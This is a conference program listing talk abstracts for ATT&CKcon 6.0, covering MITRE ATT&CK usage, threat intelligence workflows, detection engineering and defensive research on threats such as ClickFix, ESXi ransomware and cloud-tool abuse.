ATT&CKcon 6.0

ATT&CK Lead Adam Pennington discusses the latest changes in MITRE ATT&CK and what's coming down the pike for the framework.

"The ever-evolving threat landscape" is one of the most overused clichés in the security industry. It’s so ubiquitous that LLMs lead nearly every prompt response with some iteration of those five words. Unfortunately (or maybe fortunately), it doesn’t reflect reality. The threat landscape isn’t ever-evolving. If you track MITRE ATT&CK® technique abuse over time, you’ll find that adversaries largely leverage the same small set of techniques—and have for years. Threat names change, but the objectives of those threats and the capabilities they deploy are stagnant. There’s a strong illusion of change in adversary behavior propped up by new technologies, the vagaries of visibility, and our collective obsession with sophistication and novelty. You’ll read new articles about staggering breaches, but the technical details often reveal a pattern of well-worn tactics, techniques, and procedures. You’ll read news articles about fantastical targeted attacks, but if you read below the fold or between the lines, you’ll realize the adversary was after a specific organization for a specific reason. In this talk, I will use operational data and historical examples to argue that the past is indeed a good predictor of the future, and enumerate the ATT&CK techniques that organizations should prioritize.

CTI reporting can often lack the technical information for the teams who need to act on it. This talk shows how to make threat intel more tactical and useful by aligning it to the workflows of detection engineers, threat hunters, and incident responders using MITRE ATT&CK as a shared framework. I’ll walk through how to tailor reporting to different security functions, highlight key elements each team actually cares about, and show how to go from report to a hunt-ready package. I’ll also share code that extracts ATT&CK techniques from a report and pulls mapped Sigma rules to support hunting and detection. Attendees will leave with practical strategies to turn reporting into results, speak the language of their security teams, and use ATT&CK to operationalize threat intelligence across functions.

Security teams continually strive to stay ahead of adversaries by accurately identifying, tracking, and prioritizing threat behaviors. The MITRE ATT&CK Framework is an invaluable tool for categorizing adversarial Tactics, Techniques, and Procedures (TTPs). This presentation explores how systematic mapping of adversarial behaviors using the ATT&CK framework can reveal trends, helping organizations refine their detection and response strategies. Leveraging Recorded Future’s extensive threat intelligence and Insikt Group’s dedicated research into new and emerging threats, we illustrate workflows for extracting meaningful TTPs from open-source intelligence. We discuss methodologies, including manual and AI-assisted techniques, emphasizing accuracy and clarity in differentiating between human-driven adversary actions and automated malware behavior. We present practical methods for visualizing TTP trends and attack chains, highlighting effective prioritization strategies based on prevalence, impact, and visibility. Through detailed case studies, we demonstrate how to correlate ATT&CK data with real-world malware campaigns and develop targeted detection rules using Sigma and other frameworks.

What good is threat intelligence to operations if they speak a different language? Bridging the gap between cyber threat intelligence and defensive operations requires more than shared intent—it requires shared structure. Without a common framework, intelligence stays abstract and operations stay reactive. This workflow-driven approach uses the MITRE ATT&CK framework as a foundation to translate CTI into relevant hunt plans by combining adversary TTP mapping, CVE to TTP correlation, and optimized tactic selection—each reinforcing the others to align with a team’s collection capabilities to ensure. Through the symphony and harmony of this data, we can create actionable hunt plans that not only align with intelligence, but remain relevant to what your network is vulnerable to.These methods have been applied across threat emulation and hunt operations and reinforced through the development of Piranha, an open-source tool built to support—but not define—the process. For teams working to bridge the divide between intel and operations, this approach offers a practical path toward unified, threat-informed defense.

While MITRE ATT&CK has become a cornerstone of threat-informed defense, most implementations stop at the technique level—offering broad categorizations that lack the procedural depth needed for real-world application. This talk explores the critical limitations of technique-level mappings and makes the case for elevating procedures as the foundation for actionable security outcomes. We’ll examine how vague or inconsistent procedure descriptions hinder detection engineering, purple teaming, and control validation. Then, we’ll introduce a structured approach to solving this problem— defining a common schema for procedures, building a graph-based procedural intelligence repository, and operationalising it through analyst tooling and automation. Finally, we’ll show how a procedure base enables threat-informed detection, automates purple teaming, and supports meaningful control effectiveness assessments– all grounded in what attackers actually do, not just what they’re mapped to. If you’re looking to move beyond checkbox ATT&CK coverage and toward meaningful, threat-driven security, this session is for you.

In an era dominated by automation, AI tooling and simulated adversaries, one truth is still with us: the most impactful Red Team operations still hinge on human creativity. I will try to explore the MITRE ATT&CK tactics of Reconnaissance, Resource Development, and Initial Access areas where automation falters and the human mind thrives. Most of the security vendors promise full-spectrum simulation for MITRE, but these are mostly script based small automation techniques which are not reflecting real attack chains. The techniques such as building trust relationships, phishing for critical context, discovering companies' unknowns, the historical records of entities, or discovering obscure services and their underlying logic remain deeply human tasks. I will walk through real Red Team success stories where manual investigation, social navigation, and out-of-the-box thinking exposed critical gaps that tools could never detect. Attendees will see the human-driven operations, practical examples of manual techniques that worked, and a clear understanding of why early-stage tactics in ATT&CK still demand intuition, analysis, human interactions with sense, and social engineering, —not scripts.

Detection Engineering has become a cybersecurity buzzword, but many organizations have overwhelming alerts and rely on vendor provided detection capabilities. At GitLab, we've evolved beyond traditional Detection Engineering to create Signals Engineering – fundamentally digging deeper into the signals that group together into security detections. This presentation reveals how we built GitLab's Signals Engineering Team (SET) with a single vision - to ensure cybersecurity incidents never go undetected. We will cover key innovations such as AI powered detection reviews, User Attestation Module (UAM), which routes 40% of security alerts to end-users for self-validation through Slack automation, and our GitLab CI/CD pipeline that automatically validates, tests, and deploys SIEM detections with comprehensive quality checks and cover how we've leveraged MITRE ATT&CK and maturity models like Summiting the Pyramid as a north star for detection and signals engineering. The audience will learn practical implementation strategies for Detection-as-Code, metrics-driven detection improvement, and building self-service security capabilities that scale. We will cover what went well and what we learned from. Attendees will leave with a number of actionable insights and useful knowledge applicable to any organization with a desire to effectively and proactively detect potential threats.

Paste and run (aka ClickFix, fakeCAPTCHA) has been one of the most successful initial execution vectors in the past year, and it’s only getting more popular. From its first reported use in March 2024 to the March 2025 addition of T1204.004 User Execution: Malicious Copy and Paste to MITRE ATT&CK, Red Canary has seen our fair share of users tricked into copying, pasting, and executing malicious code via T1204.004. I’ll dig into some of the threat intelligence challenges we faced tracking and clustering this threat from an endpoint perspective, and share how leveraging its ATT&CK technique helped us. Attendees will learn about the Red Canary threat intel team's research into this threat over the past year and walk away with practicable detection opportunities.

CTI analysts spend hours reading technical reports to understand attack flows. This manual process creates bottlenecks in the threat response process. I built FlowViz to automatically generate ATT&CK flow diagrams from threat intelligence reports. The program uses large language models to parse STIX objects, extract attack procedures, and create interactive visualizations. Analysts click on nodes to see detailed context. The tool can also process images in technical documents and export results as PNG, JSON, or ATT&CK Flow Builder files. This presentation demonstrates how automating with FlowViz can help analysts gather insights faster. I will demonstrate real-world examples of complex attack chains that can be mapped in seconds, rather than hours. FlowViz will be open-sourced and offered as a service. I will discuss API integration for automated threat intelligence pipelines. Attendees will learn how AI augments ATT&CK framework usage without replacing human judgment.

As detection rule libraries expand, security teams face a paradox: more alerts, more tools—but limited improvement in actual threat prevention. In this talk, we present a new perspective: treating your detection stack as a living system, one that can become bloated, misfiring, or even self-destructive without care. We introduce a four-dimensional scoring framework—Resilience, Impact, Readiness, and Relevance—to help practitioners assess and strengthen their detection logic. This model helps identify broken rules, prioritize high-value detections, and reduce alert noise by focusing on measurable defensive value. We then explore how this framework lays the foundation for an exciting future: a self-healing detection system, capable of continuously improving itself. In this vision, agentic AI acts like an immune system trainer—testing defenses, pruning dead logic, and reinforcing the rules that matter most. Whether you're tuning detections by hand or imagining the next frontier in adaptive defense, this talk delivers both a practical methodology and a compelling outlook on what comes next.

As enterprise virtualization scales, hypervisors like VMware ESXi have emerged as critical—and increasingly exploited—attack surfaces. High-profile breaches such as the Scattered Spider attacks, MGM Resorts ($110M) breach, and Johnson Controls ($51M) breach, highlight the hypervisor’s massive blast radius and the lasting operational disruption that can result when this layer is compromised. This session presents a deep dive into real-world techniques leveraged by ransomware groups to breach ESXi environments, including remote execution via the Service Location Protocol (SLP), identity-based escalation through misconfigured Active Directory integrations, and traditional credential cracking targeting hypervisor management interfaces. With the release of ATT&CK v17, these attack paths are now formally recognized by the addition of the ESXi platform—providing long-needed structure and validation for what defenders have seen in the wild. We’ll walk through how each phase of these attacks maps to specific ATT&CK techniques, and show how this knowledge can inform detection, threat hunting, and hardening strategies. Attendees will leave with a practical understanding of hypervisor-layer tradecraft and a framework for closing coverage gaps using ATT&CK. This talk is ideal for red teamers, blue teamers, and infrastructure defenders looking to secure one of the most overlooked—and increasingly targeted—layers in enterprise infrastructure.

Extortion threat actors have figured out that lots of organizations use VMWare and it tends to be mission-critical infrastructure. In this talk, we will discuss how we assessed threats to a VMWare environment, how we designed defensive measures, and how those map to ATT&CK. We will discuss challenges that defenders face both justifying and implementing defenses like this. We will also talk about challenges defenders face using a tool like ATT&CK in a scenario with limited threat intelligence. This talk will be less focused on threat intelligence and more focused on a defender's perspective using ATT&CK in the context of designing defenses for a complex environment. While this talk will use VMWare as an example, we believe the concepts apply to other hypervisors and other critical enterprise systems.

Join Damien, Threat Researcher at Obsidian Security, and dive into the web of the notorious hacker group Scattered Spider. We’ll analyze Scattered Spider from a SaaS perspective, looking at their TTPs and covering notable incidents both public and undisclosed. Then, you'll learn how Obsidian has used ATT&CK to improve detection coverage for Scattered Spider and other advanced actors, and how you can too.

Endpoint "living-off-the-land" binaries are old news; attackers are now abusing built-in cloud tools instead. We introduce LOAB (Living Off Azure Binaries) and LOAR (Living Off AWS Resources): a curated set of cloud-native primitives—think azcopy, ssm start-session, sts assume-role, and more—that enable malware-free execution, lateral movement, and exfiltration. By analyzing recent ransomware and espionage breaches and mapping each primitive to the MITRE ATT&CK Cloud matrix, we created an open-source Navigator layer, a detection pack (Sigma, KQL, CloudWatch), and atomic test scripts.
During the session, a live purple-team demo shows AzCopy data theft and SSM pivoting in a sandbox, the rules firing, and an ATT&CK heat-map changing from red to green. Attendees leave with drop-in queries, ready-made tests, and a CI template that fails any pull request when coverage gaps reappear.

What happens when adversaries exploit the implicit trust placed in sector-specific file formats - like medical imaging files - instead of traditional malware? This presentation explores a healthcare-specific threat scenario involving DICOM (.dcm) files and introduces a custom MITRE ATT&CK extension that captures how these files can be weaponized. Using Workbench and Navigator, the talk walks through the creation of a new Sub-Technique - Malicious Domain-Specific File (Healthcare) - under T1204: User Execution, and demonstrates how custom Mitigations, Detections, and Analytics were developed to support it. Attendees will see how injector and scanner scripts were built to simulate abuse (e.g., spoofed transfer syntax UIDs, private metadata tags, and embedded payloads) and how these behaviors were mapped in a reusable ATT&CK Navigator Layer. This isn’t just a healthcare problem - it’s a reminder of how ATT&CK can capture threats unique to critical sectors. Attendees will leave with a concrete example of how to build sector-informed content using ATT&CK tooling and apply it to their own operational environments.

The browser is no longer just a delivery mechanism; it's an active execution surface. Yet, ATT&CK lacks a dedicated platform to represent browser-native techniques, such as extension abuse, cross-context messaging hijack, session token exfiltration, and DOM-based persistence. In this session, we walk through the process of discovering, simulating, and mapping these browser-specific TTPs using BrowserTotal, an open threat emulation and telemetry platform designed to expose browser-layer threats. We’ll share real-world observations, ATT&CK mappings, and gaps, and propose an expansion of the ATT&CK Matrix to formally introduce “Browser” as a platform. The session concludes with a bold proposal: launching a new MITRE Evaluation Track for Browser Security, which will cover simulation design, evaluation criteria, and open telemetry contributions. Key takeaways for attendees: A new lens to view browsers as threat surfaces, Real ATT&CK-aligned browser TTPs observed and simulated, Blueprint for contributing techniques to the ATT&CK matrix, Call to action to join a proposed MITRE Evaluation for browser platforms

This study analyzes MITRE ATT&CK technique usage and co-occurrence patterns across sentence-level and report-level annotations in the CTI-HAL dataset. We explore both the limits and insights of rule-based association mining at the sentence level and demonstrate stronger co-occurrence signals when techniques are grouped at the document level. Frequency distributions, negative results, and the implications for threat detection, adversary emulation, and ATT&CK coverage prioritization are discussed. We also evaluate the role of annotation sparsity, technique coverage bias, and the implications of low co-occurrence on adversary modeling.

Augmented- and virtual-reality head-mounted displays (HMDs) are quickly moving from gaming novelties to mission-critical platforms in medicine, training, and industrial control. Yet today’s security monitoring tools cannot trace attacks that cross the headset/PC boundary or exploit the unique sensory pipeline of immersive systems. We introduce REALITYCHECK, the first provenance-based auditing framework that maps the entire AR/VR kill-chain to MITRE ATT&CK tactics, techniques, and procedures (TTPs) and then reconstructs each step in a single multilayer provenance graph. Starting from an eight-attribute threat model derived from 25 real-world exploits, we extend the W3C PROV ontology with new entities such as SpatialBoundary and HeadsetCollisionTracker and automatically correlate logs from OpenXR, Android, and Windows endpoints. A novel session-state execution-partitioning algorithm eliminates 70% of false dependencies, while graph-pruning retains only the vertices and edges that form Direct or Indirect Forensic Connections to ATT&CK-labelled detection points. Evaluated on Meta Quest 2 (90% of the HMD market) against 25 attacks, including new ATT&CK-aligned techniques for Perceptual Manipulation, 6DoF Data Exfiltration, and Endpoint-Driven Lateral Movement, REALITYCHECK achieved perfect root-cause coverage with <6 % runtime overhead. Attendees will leave with an open-source tool and a reproducible methodology for building ATT&CK-driven detections in emerging XR environments.

At ATT&CKcon 5.0, we made the case that ATT&CK objects can be represented in graph format by defining a common cyber-ontology. Since then, we have been working with the D3FEND team to define ATT&CK objects using the D3FEND ontology. This talk shares our progress on this front, including how we redefine Data Sources, Techniques, and Procedures. We also show how the audience can use this work to redefine how they do detection engineering and incident response using ontology/graph-based principles.

Securing AI systems and organizations using AI is a fast-evolving space in emerging risk. This talk contextualizes ATT&CK and it’s derivative framework ATLAS against current risk management frameworks with practical examples, drawn from real examples as well as applied experience in framework and resource development for AI security. Attendees with a familiarity in ATT&CK will take away an understanding of where AI systems are at risk, limitations of MITRE frameworks for AI attacks today and corresponding solutions, and ways to enhance defenses. No AI experience needed.